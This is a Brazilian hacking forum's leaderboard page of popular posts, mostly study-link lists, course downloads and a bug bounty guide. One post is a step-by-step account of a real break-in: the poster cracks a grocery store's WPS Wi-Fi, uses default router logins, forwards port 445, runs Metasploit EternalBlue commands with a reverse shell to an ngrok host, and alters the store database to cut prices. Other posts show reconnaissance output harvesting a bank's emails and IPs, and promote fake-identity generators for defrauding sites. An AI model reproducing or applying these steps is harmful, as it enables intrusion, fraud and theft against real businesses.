Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 08/21/18 in all areas

  1. 10 points
    E ae galera, trago pra vocês uns materiais para estudo. Nada de apostila, tudo pela internet. Eu peguei o básico do básico e reuni. Não precisa estudar todo dia, toda hora, estudem quando tiver vontade. É serio, uma hora você vai falar "agora eu vou estudar", espere esse momento chegar. Eu segui dessa seguinte maneira: GNU/Linux > Redes > Programação > Hacking. Vamos lá. No nosso repositório você encontra de tudo, todo tipo de material. Link do nosso repositório http://pc.cd/VfbotalK Senha: issonaoehumasenha5/9 INTRODUÇÃO AO GNU/Linux INTRODUÇÃO -> https://goo.gl/Sjih4K CURSO GNU/Linux -> https://goo.gl/SlZgwD DOMINANDO O TERMINAL -> https://goo.gl/Ka6Uu1 A ARVORE DE DIRETÓRIO DO LINUX -> https://goo.gl/g5SmeI INTRODUÇÃO AO BÁSICO DO BÁSICO DE REDES: TCP/IP -> https://goo.gl/XPNEH9 UDP -> https://goo.gl/1M5SYF DIFERENÇA DE TCP E UDP -> https://goo.gl/j0MtY0 HUB, SWITCH, ROTEADOR E MODEM -> https://goo.gl/SAQbkI BRIDGE -> https://goo.gl/Wu4hcj NAT -> https://goo.gl/c8NjHH DNS -> https://goo.gl/bsMdUR GATEWAY -> https://goo.gl/OFOkkZ DHCP -> https://goo.gl/5gnZrc LISTA DE PROTOCOLOS DE REDES -> https://goo.gl/EJ1YvZ CURSO DE REDES -> https://goo.gl/XijVVc INTRODUÇÃO A PROGRAMAÇÃO LOGICA DE PROGRAMAÇÃO -> https://goo.gl/9GNGHs PYTHON -> https://goo.gl/xkzYkk C -> https://goo.gl/KYgUKn C# -> https://goo.gl/C4zvN0 C++ -> https://goo.gl/HuhBSs PHP -> https://goo.gl/LymDBl RUBY -> https://goo.gl/kgcA1g JAVA -> https://goo.gl/q0sGmN HACKING SOU INICIANTE, QUERO SER HACKER, POR ONDE COMEÇO -> https://goo.gl/TiM39Y OS PRIMEIROS PASSOS DE UM HACKER INICIANTE -> https://goo.gl/BLIM5k COMO SER UM HACKER DE SUCESSO -> https://goo.gl/QrgQjW COMO FUNCIONAM OS CYBER ATAQUES PARTE 1 -> https://goo.gl/55SDY4 COMO FUNCIONAM OS CYBER ATAQUES PARTE 2 -> https://goo.gl/QYaRHc KOSHIMARU KISARA - INTRODUÇÃO AO CURSO HACKER -> https://goo.gl/2rl55d CAVEIRATECH - INTRODUÇÃO AO HACKING E PENTEST -> https://goo.gl/KsTfvw ANONIMATO -> Anonsurf: https://goo.gl/vEyWOu && Whonix: https://goo.gl/VSajTM CANAIS COM CONTEUDO DE TECNOLOGIA/HACKER -> https://goo.gl/TB4px8
  2. 9 points
    Estamos aqui novamente rapaziada.... Hoje vamos falar sobre o que estudar para ser um bom caçador de bugs ou caçador de recompensas (COMO PREFERIR). Vamos primeiro desmistificar alguns mitos: 1- "BUG HUNTER É MAIS CAPACITADO DO QUE UM PENTESTER " /// Bug Hunter = Etical Hacker = Pentester. (WTFF?!?!?!?!?)) "Bug Hunter" é o termo dado para alguém que procura bugs em algum software em busca de recompensa (um pentester também, porém possui um tempo limitado e pode ser pago caso não encontre algo ) e ele utiliza as mesmas técnicas que um Pentester utiliza/utilizaria para realizar seu Teste de Intrusão. Existem SIM! Bug Hunters que são muito mais capacitados do que um Pentester, assim como também existe o contrário. 2- "VOU FAZER BUG PORQUE POIS DÁ MAIS DINHEIRO" /// Não é bem assim que funciona... Um Pentester pode ganhar bem mais do que um Bug Hunter, assim como o contrário. No caso de Bug Hunters, você recebe de acordo com a criticidade da vulnerabilidade (e onde) que você encontrou. O Pentester (se fizer parte de uma empresa) começará ganhando X e dependendo do seu desempenho poderá ganhar mais ou menos (). 3- "TAL BUG HUNTER TRABALHOU UMA NOITE E GANHOU $30.000" /// NÃO, NÃO E NÃO. Esse valor que foi pago, não foi por aquela semana/noite que ele passou procurando. Esse valor é fruto de todo conhecimento que foi adquirido ao longo do tempo que ele dedicou. 4- "POSSO SER BUG HUNTER E PENTESTER AO MESMO TEMPO" /// Sim, como já foi tido, Bug hunter nada mais é do que um pentester que realiza testes em busca de vulnerabilidades em softwares. Você pode sim ter um emprego na área de Segurança sendo um Pentester e fazer Bug Bounty no tempoo livre, tanto por diversão, quanto para aumentar sua renda. (). Você pode também ser aquele cara que sempre faz Bug Bounty, e além de caçar bugs nos programas das empresas, oferecer um serviço de Pentest para alguém. Bom, acho que os principais mitos foram falados, então vamos ao conteúdo. Já vimos que um Bug Hunter nada mais é do que um Pentester que busca bugs em empresas que possuem um programa de Bug Bounty. Então seguindo a lógica, podemos utilizar OS MESMOS CONTEÚDOS DE PENTEST para estudar, aprender, praticar e ir caçar seus bugs. Primeiro de tudo, o que seria de um Pentester sem as bases da segurança da informação? Não o CIDA, mas as bases que fazem com que a Segurança da Informação seja importante. Estou falando de Programação, Redes, Sistemas Operacionais, etc etc. E tendo esse princípio, iremos focar aqui no Pentest/Bug Bounty em Aplicações Web (no qual é o meu foco). Começando pela Programação, é difícil falar a você qual a melhor linguagem para ser estudada (JAVA NÃO É). O que eu recomendo é que você comece lá de baixo e ir evoluindo, dessa forma: HTML -> É interessante estudarmos HTML para entender como um site é estruturado, seus elementos, e também os tipos que ataque que o envolve. CSS -> Não muito diferente do HTML, é legal aprendermos pois o CSS hoje, nos possibilita utilizá-lo como vetor de ataque. Como exemplo deixo esse report de uma falha que utiliza o CSS como vetor de ataque => CSS Injection on /embed/ via bgcolor parameter leaks user's CSRF token and allows for XSS JAVASCRIPT -> Aqui, é extremamente importante que você conheça a fundo JavaScript, tanto pelos ataques que o envolvem, quanto pelos seus frameworks e plataformas que são criados e utilizados (criando muita força) tanto no Front-End quanto no Back-End. PHP -> Acho interessante estudar sobre pois ainda é altamente utilizado nos sites, por ser uma linguagem Server-Side, por ser fácil e por conter muito conteúdo na NET. SQL -> É essencial que seja aprendido o SQL devido ao fato de que quase todas as aplicações hoje utilizam algum banco de dados (relacional) para guardar suas informações. Python -> Recomendo o Python por ser uma linguagem muito fácil, poderosa e pode te ajudar bastante quando você precisar desenvolver alguma coisa rápida (claro que vai variar de programador para programador). XML -> Como assim XML??? Segue o mesmo princípio do HTML, você deve estudar para entender como determinados ataques funcionam, como por exemplo: XXE in Site Audit function exposing file and directory contents JAVA -> Por ser multiplataforma, e permitir que você decompile alguma biblioteca de forma mais fácil e legível para buscar vulnerabilidade como a que foi descoberta pelo João Matos (sou um grande fã) esse ano. CVE-2018-14667 Muitas outras tecnologias que existem, fica ao seu critério. Recomendo fortemente estudar as tecnologias que estão sendo utilizadas no site que você está procurando por vulnerabilidades. Um plugin que utilizo bastante para isso é o Wappalyzer. Partindo para Redes, é indispensável o conhecimento na área, pois você precisa entender como a internet funciona, como as aplicações se comunicam, como os protocolos conversam, quais regras são utilizadas etc. Protocolos de Transmissão como TCP/UDP -> É necessário ter conhecimento da base da internet, como os dados são trafegados e entreges etc. Protocolos de Aplicações (SSH, Telnet, HTTP) -> Toda aplicação utiliza algum protocolo para se comunicar, são inúmeros e cada um com suas devidas regras. Em especial, recomendo estudar fortemente o procotolo HTTP, pois ele possui diversos métodos, diferentes versões, e inúmeros Headers que você precisa entender como funcionam para tirar proveito e utilizar como vetores de ataque. Todos os outros assuntos que envolvem redes são bem vindos, pois dependendo da aplicação que você irá testar, você precisará entender como o protocolo dessa aplicação funciona. Indo pro último, mas não menos importante são os Sistemas Operacionais. Linux -> É essencial que você tenha conhecimentos relacionados ao sistema operacional do pinguim, pois é fortemente utilizado em servidores, e dependendo de cada distribuição, algumas coisas podem mudar. É muito importante que você entenda como funciona cada sistema operacional, pois haverá situações nas quais você poderá ter acesso à algum e precise de seus conhecimentos para realizar determinada ação. Windows (IMAGINEM QUE O EMOTICON É UMA JANELA. "ABSTRAÇÃO") -> Máquinas com esse sistema operacional também são utilizadas em diversos servidores espalhados ao redor do mundo, não diferente do Linux, você deve entender como funciona o sistema para conseguir realizar determinadas funções que sejam necessárias para dar continuidade ao seu Bounty. FreeBSD -> FreeBSD ainda é utilizado para servidores, e como os outros sistemas descritos, você precisará entender como ele funciona. PRATIQUE CTF, LEIA REPORTS, LEIA WRITEUPS, TUDO ISSO PODERÁ AJUDAR VOCÊ A DESENVOLVER SEU MINDSET. Após pesquisar em vários lugares (fórum do BugCrowd) resolvi colocar aqui materiais para que vocês possam estudar e começarem a fazer seus programas de Bug Bounty. LIVRO (Inglês) -> The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (Dafydd Stuttard,‎ Marcus Pinto) OBS: eu traduzi ele por completo, se quiserem eu passo o link para vocês. LIVRO (Português) -> Testes de Invasão - Uma Introdução Prática ao Hacking (Georgia Weydman) LIVRO (Português) -> Pentest em Aplicações Web (Daniel Moreno) LIVRO (Inglês) -> Owasp Testing Guide (Owasp) LIVRO (Inglês) -> Web Hacking 101 - How to Make Money Hacking Ethically (Peter Yaworski) CURSO (Inglês) -> Hacker101 (HackerOne) CURSO (Inglês) -> Bugcrowd University (BugCrowd) WRITEUP DAS FALHAS EXPLICADAS (Inglês) -> Pentester Land REPORTS DIVULGADOS (Inglês) -> HackerOne CANAL NO TELEGRAM SOBRE REPORTS (Inglês) -> Bug Bounty Channel BOT DE DIVULGAÇÃO DE RELATÓRIOS (Inglês) -> Public Disclosure Bot PAPERS SOBRE CTF/BUGBOUNTY (Português) -> Hackaflag Papers - Hackaflag Academy Bom galera, acho que por hoje é só. Espero que tenha despertado o interesse em vocês. Qualquer dúvida, sugestão, correção, discussão, se você não concorda em alguma coisa deixa aí nos comentários, tudo é bem-vindo !!!!
  3. 4 points
    Estou de volta com os desafios! Quem quiser participar, aprender, brincar... Chega junto! https://desafio-fsociety.webcindario.com
  4. 4 points
    Curso de PHP do Zero ao Profissional - Bonieky Lacerda‎ Tamanho Total: 21.3 GB Formato dos Arquivos: MP4/M4V Links: Parte 1:Download Parte 2: Download Parte 3:Download *Caso alguns videos não executar instale o K-Lite codec*
  5. 4 points
    Cerca de 29GB de dados no site do Wikileaks. https://file.wikileaks.org/file/ https://file.wikileaks.org/torrent/
  6. 4 points
    Aqui tem varios cursos incluindo 137 cursos da Alura Bons estudos http://listaodownloadcursos.blogspot.com/ Alguém tem o duplique seu salario Seiti Arata?
  7. 3 points
    Olá venho mostrar como fiz para entrar no computador do mercadinho remotamente, foi o primeiro passo antes deu alterar o preço do cigarro para 4 reais (antes era R$ 8,50 ja faz 5 dias e nada foi alterado ), Passos: Entrar na rede Mapear a rede & encontrar o caixa Encontrar vulnerabilidades Redirecionar portas do caixa para WAN Invaindo o caixa Passo 1 Como voce não vai poder simplesmente se conectar a LAN , o padrão é tentar fazer uma conexão por Wi-fi, no meu caso a rede tinha WPS ligado, então usando o WPS App para encontrar o pin da rede para que eu possa conectar, voce pode usar varias ferramentas para tentar fazer ter conexao num wifi, Passo 2 Utilizei um app chamado Network Scanner para fazer uma varredura na rede, com isso você pode pegar cada dispositivo conectado a rede, procure por computadores na rede, no meu caso só existe 1 caixa no mercadinho e com isso foi facil descobrir qual dos hosts era e lembre-se reconhecer o sistema que está rodando, se for Windows você tem mais chances de conceguir, aproveite e pegue também o endereço do Gateway no caso: 192.168.1.1 //Simulaçao Passo 3 Ainda no Network Scanner, verifique as portas do computador , verifique se existe alguma porta vulneravel, no meu caso a 445 pode ser vulneravel ao terrivel EternalBlue e como o mercado não é muito grande provavelmente não fazem atualizaçao o sistema no sistema, oque pode ser um error fatal não deixar seu sistema atualizado, Passo 4 Entre no navegador e entre no gateway (Geralmente 192.168.1.1 ou 192.168.0.1), provavelmente irá pedir login ou senha, você pode tentar usar o routersploit no android para poder encontrar o login e senha do roteador, mas você pode fazer testes rapidos em logins padroes (Lista abaixo) , assim que conceguiu acesso ao roteador você precisa liberar portas para o ip do caixa (lembre de redirecionar para o IP do caixa) geralmente uma pagina chamada Port Forwarding, achou? entao adicionar uma nova regra e Porta Publica (Public Port) use portas entre 1001-9999 pois a maioria dos scanners de portas scaneia de 1-1000 e em Porta Privada (Private Port) voce irá colocar a porta que se encontra uma possivel vulnerabilidade no meu caso 445 e no protocolo (protocol) voce coloca TCP , e aumentar a chance nenhuma outra pessoa achar esse caminho, caso tenho dificuldades para liberar portas no roteador aproveite a internet gratis e pesquisa como abrir portas usando o modelo do roteador (que pode ser facilmente encontrado fusando no painel) Logins padrao: admin admin admin (SENHA EM BRANCO) admin gvt12345 guest guest Passo 5 Antes de ir embora para casa aproveite e pegue o IP WAN da rede, facilmente encontrado no site: MyIP org ou MeuIP br, em casa já com o café do lado, abra um bloco de notas e grave suas informaçoes nela ex: 164.216.21.3:4444 -> 192.168.1.21:445, bom vamos ver se realmente é vulneravel ao ataque do eternalblue , abra o metasploit e use smb_ms17_010 para checar se é vulneravel, exemplo do meu caso: RHOSTS: 164.216.21.3 RPORT: 4444 comandos abaixo. msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 164.216.21.3 set RPORT 4444 exploit caso o retorno ter Host is likely VULNERABLE to MS17-010! é vulneravel como no meu caso abaixo: [+] 164.216.21.3:4444 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [*] 164.216.21.3:4444 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Boa agora vamos explorar essa vulnerabilidade use o exploit windows/smb/ms17_010_eternalblue para invadir, no meu exemplo irei usar o ngrok para fazer tunnel com o meu localhost (APRENDA USAR O NGROK AQUI ) utilizarei o payload windows/meterpreter/reverse_http use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 164.216.21.3 set RPORT 4444 set LHOST 0.tcp.ngrok.com set LPORT 46707 exploit Pronto, agora estude o computador, meus passos para alterar o banco de dados: Naveguei até a area de trabalho, verifiquei todos os links, e vi que tinha um chamado Sis comerce, baixei o executavel dele, decompilei ele com o .NET Reflector, verifiquei que ele faz conexão com o banco de dados da Microsoft SQL Server, usando o mono desenvolvi uma ferramenta para conectar no banco usando os dados que decompilei (Existe uma classe conectora do DB contendo host, user...) só apliquei a mesma coisa no mono, simplesmente atualizei o preço de todos os produtos com o nome "CIGARRO DE PALHA MINAS" para 4.00. Videos que podem ajudar:
  8. 3 points
    Achei esse fonte que fiz a um bom tempo: um programinha que criptografa arquivos. Você pode usá-lo em arquivos de qualquer extensão: .jpg, .gif, .txt, .rar, .wav, .pdf, .odt, etc... Exemplo: [email protected]:~$ ./cripto fsociety.jpg será criado um arquivo fsociety.jpg.cripto O inverso: [email protected]:~$ ./cripto fsociety.jpg.cripto Caso queiram mudar a regra para criptografar/descriptografar, vejam as linhas (que estão em cifra de caesar 3): while((c = getc(a)) != EOF) putc(c + 3, b); while((c = getc(a)) != EOF) putc(c - 3, b); Com exceção de arquivos de texto, não fica muito óbvio qual criptografia está sendo usada. #include #include int main(int argc, char *argv[]) { int c, t; char ext[6], out[100] = ""; FILE *a, *b; if(argc != 2) { printf("\nUse: ./cripto file\n"); printf("Examples:\n"); printf("Encrypt a file:\n"); printf("./cripto image_file.jpg\n\n"); printf("Decrypt a file:\n"); printf("./cripto image_file.jpg.cripto\n\n"); return 0; } t = strlen(argv[1]); ext[0] = argv[1][t-6]; ext[1] = argv[1][t-5]; ext[2] = argv[1][t-4]; ext[3] = argv[1][t-3]; ext[4] = argv[1][t-2]; ext[5] = argv[1][t-1]; if(strcmp(ext, "cripto")) { a = fopen(argv[1], "r"); strcat(out, argv[1]); strcat(out, ".cripto"); b = fopen(out, "w"); while((c = getc(a)) != EOF) putc(c + 3, b); /* caesar cipher */ } else { a = fopen(argv[1], "r"); argv[1][t-7] = '\0'; strcat(out, argv[1]); b = fopen(out, "w"); while((c = getc(a)) != EOF) putc(c - 3, b); /* caesar cipher */ } fclose(a); fclose(b); return 0; }
  9. 3 points
    Um fodendo Pack de livros sobre Psicologia e Psicanálise https://mega.nz/#F!UCIjka7K!adIUwh8jClw9uPjTH34YkA
  10. 3 points
    Dicionário Hacker. Créditos TheCyberTeam DicionarioHacker(TheCybersTeamv1.1).pdf
  11. 3 points
    Qual o procedimento pra ficar rico sem trabalhar?
  12. 3 points
    Ladies and Gentlemen, é com enorme prazer que lhes apresento a nossa nova campanha de criação de conteúdo. Vamos sortear 1 camiseta ao final de cada mês para os membros que mais criaram conteúdo em nosso Fórum, a fim de incentivar a comunidade a criar mais conteúdo e divulgar os eventos da cultura hacker pelo nosso país. Abaixo segue o primeiro modelo que sortearemos, é uma camiseta da comunidade Inurl Brasil, como no modelo abaixo.
  13. 3 points
    Esses são alguns PDFs sobre engenharia social que eu li, e queria compartilhar com vocês ENGENHARIA SOCIAL O FATOR HUMANO NA SEGURANÇA DA INFORMAÇÃO. .pdf Prevenção para ataques de engenharia social.pdf Técnicas de Engenharia Social .pdf Engenharia social (segurança da informação).pdf ENGENHARIA SOCIAL O ELO MAIS FRÁGIL DA SEGURANÇA NAS EMPRESAS .pdf
  14. 3 points
    Apostilas de Segurança, Segurança da informação, Anonimato na internet, Firewall, Criptografia, e etc. Aula de seguranca.pdf firewall proteçãp.pdf firewall tuto basico.pdf Fundamentos de sistemas de segurança da informaçao.pdf Gestão de Segurança da Informação.pdf Tutorial como ficar invisível.pdf Técnicas Hacker soluções para segurança 1.pdf Técnicas Hacker soluções para segurança 2.pdf Sua Rede Wireless é Realmente Segura.pdf Sistema para identificar invasão.pdf Segurança Ofensiva.pdf Introdução à Segurança da Informação.pdf Manual da Segurança da Informação.pdf extensoes_seguranca_DNS.pdf
  15. 2 points
    Olá, sou técnico em TI e sempre tive curiosidade em aprender mais porém eu quase desisti da área porque não tinha estrutura suficiente(hardware) pra avançar nos estudos mas desde que comecei a trabalhar a chama reacendeu e voltei a buscar por conhecimento. Não curso faculdade de TI(embora exista uma grande chance de ser minha 2ª graduação) porque não gosto de estudar apenas um assunto. Acho que meu curso técnico foi o suficiente para dar o ponta pé na área, desde então acredito que consigo aprender muitas coisas por conta própria. Ah, e um dos meus objetivos com TI é aprender sobre segurança da informação. É ótimo ter a disposição blogs e fóruns como este onde o conhecimento é compartilhado com qualidade.
  16. 2 points
    Tutorial BÁSICO sobre a ferramenta theHarvester [Kali Linux] ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * theHarvester Ver. 3.0.6 * * Coded by Christian Martorella * * Edge-Security Research * * [email protected] * ******************************************************************* theHarvester é uma ferramenta muito simples, mas eficaz, projetada para ser usada no início de estágios de um teste de penetração. Essa ferramenta reúne e-mails, nomes, subdomínios, IPs e URLs usando vários dados públicos. Os motores de busca dessa ferramenta são: baidu, bing, bingapi, censys, crtsh, dogpile, google, google-certificates, googlecse, googleplus, google-profiles, caçador, linkedin, netcraft, pgp, threatcrowd, twitter, vhost, virustotal, yahoo. A ferramenta theHarvester conta as seguintes opções: -d: Domínio para pesquisar ou nome da empresa -b: fonte de dados: baidu, bingapi, bingapi, censys, crtsh, dogpile, google, google-certificates, googlecse, googleplus, google-profiles, caçador, linkedin, netcraft, pgp, threatcrowd, twitter, vhost, virustotal, yahoo, tudo -g: use o Google dorking em vez da pesquisa normal no Google -s: inicia no número de resultado X (padrão: 0) -v: verifica o nome do host por meio da resolução de DNS e procura por hosts virtuais -f: salva os resultados em um arquivo HTML e XML (ambos) -n: executa uma consulta reversa de DNS em todos os intervalos descobertos -c: executa uma força bruta de DNS para o nome de domínio -t: executar uma descoberta de expansão do TLD de DNS -e: use este servidor DNS -p: port varre os hosts detectados e verifique se há Takeovers (80,443,22,21,8080) -l: limita o número de resultados para trabalhar (o Bing passa de 50 para 50 resultados, Google 100 a 100 e o PGP não usa essa opção) -h: use o banco de dados SHODAN para consultar hosts descobertos Pra você reunir as informaçoes sobre a empresa basta seguir os exmplos abaixo: (OBS: o nosso exemplo será a bradesco.com) [email protected]:~# theharvester -d bradesco.com -l 500 -b all Agora uma leve explicação sobre o comando citado acima: -d <domínio para pesquisar> -l <limita o número de resultados para trabalhar> -b <fonte de dados> Logo após a execução do comando citado acima ira aparecer isso: [email protected]:~# theharvester -d bradesco.com -l 500 -b all Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************************* * * * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ * * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| * * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | * * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| * * * * theHarvester Ver. 3.0.6 * * Coded by Christian Martorella * * Edge-Security Research * * [email protected] * ******************************************************************* found supported engines [-] Starting harvesting process for domain: bradesco.com Full harvest on bradesco.com [-] Searching in Google.. Searching 0 results... Searching 100 results... Searching 200 results... Searching 300 results... Searching 400 results... Searching 500 results... [-] Searching in PGP Key server.. Searching PGP results... [-] Searching in Netcraft server.. Searching Netcraft results.. [-] Searching in ThreatCrowd server.. Searching Threatcrowd results.. [-] Searching in CRTSH server.. Searching https://crt.sh?id=1093112628 Searching https://crt.sh?id=594086613 Searching https://crt.sh?id=181851923 Searching https://crt.sh?id=30562534 Searching https://crt.sh?id=28194046 Searching CRT.sh results.. [-] Searching in Virustotal server.. Searching Virustotal results.. [-] Searching in Bing.. Searching 50 results... Searching 100 results... Searching 150 results... Searching 200 results... Searching 250 results... Searching 300 results... Searching 350 results... Searching 400 results... Searching 450 results... Searching 500 results... [-] Searching in Hunter: Done Searching Results [-] Searching in Google Certificate transparency report.. [-] Searching in Censys: Harvesting results No IP addresses found [+] Emails found: ------------------ [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 5[email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [+] Hosts found in search engines: ------------------------------------ Total hosts: 33 [-] Resolving hostnames IPs... 2Fwww.bradesco.com:empty 3dwww.bradesco.com:empty 7c2Fwww.bradesco.com:empty adc.bradesco.com:200.155.82.1 bram.bradesco.com:200.155.82.52 bsp.bradesco.com:empty bspa.bradesco.com:empty im-access1.bradesco.com:200.155.91.1 im-webcon1.bradesco.com:200.155.91.2 multicanal.bradesco.com:200.155.85.71 portaladm.bradesco.com:200.155.82.142 portaldsps.bradesco.com:200.155.87.213 portalpatrimonio.bradesco.com:200.155.82.238 sip.adc.bradesco.com:empty sip.bradesco.com:200.155.91.1 sip.bram.bradesco.com:200.155.91.1 sip.bsp.bradesco.com:empty sip.bspa.bradesco.com:empty sip.corpr.bradesco.com:empty wap.bradesco.com:200.155.82.51 webaccess.bradesco.com.br:200.155.87.163 webta.bradesco.com:200.155.86.58 wspf.bradesco.com:200.155.82.217 www.bradesco.com:200.155.83.77 www.bram.bradesco.com:200.155.82.52 www.edi.bradesco.com:200.155.84.37 www.ib2.bradesco.com:200.155.82.116 www.ib6.bradesco.com:200.155.82.130 www.icm.bradesco.com:200.155.83.211 www.m.bradesco.com:200.155.82.123 wwws.portaladm.bradesco.com:200.155.86.135 wwwss.bradesco.com:200.155.90.16 Nesse caso utilizando o dominio bradesco.com o theHarvester reuniu Emails, hostnames e IPs sobre a empresa. Caso você queira utilizar o banco de dados SHODAN basta você colocar -h no comando, a seguir um exemplo do uso do SHODAN: [email protected]:~# theharvester -d bradesco.com -l 500 -b all -h Para você salvar os resultados em HTML basta colocar -f <nome_do_arquivo_.html>, a seguir um exemplo do uso do -f: [email protected]:~# theharvester -d bradesco.com -l 500 -b all -h -f resultados.html O documento criado ficaria na 'Pasta Pessoal' [/root] [OBS: Lembrando que estou usando o Kali Linux] Espero ter esclarecido a ferramenta theHarvester para vocês, façam bom uso dessa ferramenta. Espero que tenham gostado!
  17. 2 points
    Site com geradores de um monte de coisa: CPF, Endereço, Dados de pessoas completos, contas bancárias, etc. Gerador Acreditem, já vi sites caírem nesses dados falsos. Se não me engano o site "A casa das brasileirinhas" aceitava esses dados, durava 3 dias até cair a conta.
  18. 2 points
    Bom dia pessoal! Tenho 21 anos e como iniciante em programação gostaria de obter algumas respostas. Vou direto ao ponto. Sendo programador você também é um hacker? Se sim, qual linguagem usa-se normalmente? Já ouvi falar que Python, php são fundamentais mas como dito anteriormente sou iniciante. Claro que isso se possível tem que ser muito bom e depois de manjar em programação tenho que estudar pentest.. enfim, obrigado desde já.
  19. 2 points
    Bom dia! Eu sou um programador atualmente eu estou na programação de aplicações android (jogos), mas eu também estou muito interessado em segurança de computador. É um mercado em crescimento que vejo muito futuro. Espero aprender e estar atualizado neste fórum!
  20. 2 points
    #RESPOSTANDO MEU POST DO FACEBOOK! [Material / Conteúdo / PDF's / Livros de TI] - Olá soldados de plantão. Hoje vou compartilhar uns PDF's de TI com vocês. ( Espero que gostem ) Guia do Hacker Brasileiro: https://drive.google.com/file/d/0Bx_3hSudn5BhOW5MazBfX3VsakU/view ________________________________________________________________________________________________________ Tópicos Introdutórios em Computação Forense: https://drive.google.com/file/d/0Bx_3hSudn5BhUVRjQ3dLVnM2MjQ/view _______________________________________________________________________________________________________ Curso de Linguagem PHP: https://drive.google.com/file/d/0Bx_3hSudn5BheVpFSXdEVURraXM/view ______________________________________________________________________________________________________ O livro Secreto: https://drive.google.com/file/d/0Bx_3hSudn5BhZmV1S1Zkd3JmYzQ/view ____________________________________________________________________________________________________ Livro Proibido/Curso de Hacker: https://drive.google.com/file/d/0Bx_3hSudn5BhT3lUM0FYZmloYTA/view __________________________________________________________________________________________________ Java Básico Intermediário: https://drive.google.com/file/d/0Bx_3hSudn5BhWExIWkNzS2F6U3c/view _______________________________________________________________________________________________ A Arte de Invadir: https://drive.google.com/file/d/0Bx_3hSudn5BhaXpIV1UwajNNTTg/view _____________________________________________________________________________________________ As Armas da Persuasão: https://drive.google.com/file/d/0Bx_3hSudn5BhcDBVanFZa3A1TUU/view ____________________________________________________________________________________________________________________ Introdução ao Prompt de Comando do Windows (CMD): https://drive.google.com/file/d/0Bx_3hSudn5BhWXFTWmFYdVdTT1k/view ____________________________________________________________________________________________________________________ - Loock Underwood
  21. 2 points
    Fiz um vídeo sobre o onionscan, explicando a teoria e a prática da ferramenta. Abre e da like, 50 faço continuação.
  22. 2 points
    Olá, as aulas estão voltando, e estou indo para o 1 ano do ensino médio, queria saber se conhecem algum livro ou apostila bom, que me ajude para estudar. Farei uma prova de enturmação, de português, matemática e inglês, inglês eu já sou bom, mas o resto preciso de ajuda! Obrigado desde já !
  23. 2 points
    bom no momento em que vc faz a conexao vc ja ta requisitando um pacote entao isso e basicamente a mesma coisa o que muda e o tipo de pacote que vc vai envia se vai ser tcp udp SYN...
  24. 2 points
    Curso de Inglês Mairo Vergara 4.0 24 Módulos Tipo de arquivo: Torrent Tamanho do arquivo Torrent: 309.64KB Tamanho do arquivo baixado: 23.1GB Servidor: MEDIAFIRE LINK: DOWNLOAD *Aguarde 5 segundos e feche a propaganda* Tem Bastante seeds aproveitem! Se o link estiver OFF, avise nos comentários!
  25. 2 points
    Já dei inicio ao projeto, segue o LINK DA PLAYLIST. Espero ajudar, quem queira !
  26. 2 points
    https://drive.google.com/drive/folders/0BzaTvtY-IGcpekJGYUwyZ09MRHM
  27. 2 points
    A conta fica logada por que sua sessão fica aberta no servidor deles. Não há armazenamento das credenciais na sua máquina a não ser que você escolha salvar naquela "caixa de mensagem" ou esteja com algum keylogger.
  28. 2 points
    Olá haskers, dboa? Esse e o primeiro post da serie "mobile hacking", que vai ser uma serie onde eu ensino a fazer diversos ataques utilizando o celular chega do verde Bom vou responder primeiro a algumas possíveis perguntas: 1 - Vou poder fazer isso no meu iPhone / Windows Phone? Poder você até pode, mas eu não vou ensinar aqui (), tudo que eu for passar nessa serie é limitado ao Android, por ser Linux Based (Não me venha com: "mas WP é windows", se disser isso eu te haskeio). Então se você for usuário de outro sistema que não seja o Android e está muito interessado em hackear pelo celular, adquira um, se precisar de ajuda na escolha sinta-se livre para me mandar uma mensagem 2 - Ah mas você só vai me ensinar a mexer no terminal ou fazer coisas que eu já sei fazer no Desktop só que pelo celular?? Sim, mas não é tão simples quanto parece, diversos requerimentos pra rodar alguns scripts (como libs por exemplo) não estão presentes no Android nativamente, vou ensinar como "instalar" tais requerimentos para poder utilizar dos scripts... 3 - Eu preciso ter root no meu celular?? Nesse primeiro tutorial não, mas nos próximos sim, pois iremos trabalhar com a edição de pastas do sistema do Android que vem nativamente bloqueadas e só podem ser acessadas após o root. 4 - Eu vou conseguir fazer o que o Elliot fez na serie na parte da delegacia? Sim, mas eu vou segurar bastante esse tutorial :3 Bom vamos ao tutorial Recomendo bastante atenção, um movimento errado e seu celular pode virar uma mini ogiva nuclear de alta potencia e gerar uma grande devastação... (fecha essas pornografia aí) Vamos precisar dos seguintes apps: Termux: https://play.google.com/store/apps/details?id=com.termux&hl=pt_BR Termux:API (para ter acesso ao APT) https://play.google.com/store/apps/details?id=com.termux.api&hl=pt_BR Observação: O Termux só está disponível para os celulares com versão 5.0 ou superior do Android, caso não esteja nessa versão mais queira tentar do mesmo jeito utilize esse app : https://play.google.com/store/apps/details?id=com.gnuroot.debian&hl=pt_BR (Podem haver alguns erros durante o procedimento, comenta aí que eu ajudo) E por ultimo o meu preferido por causa do nome Hacker's Keyboard 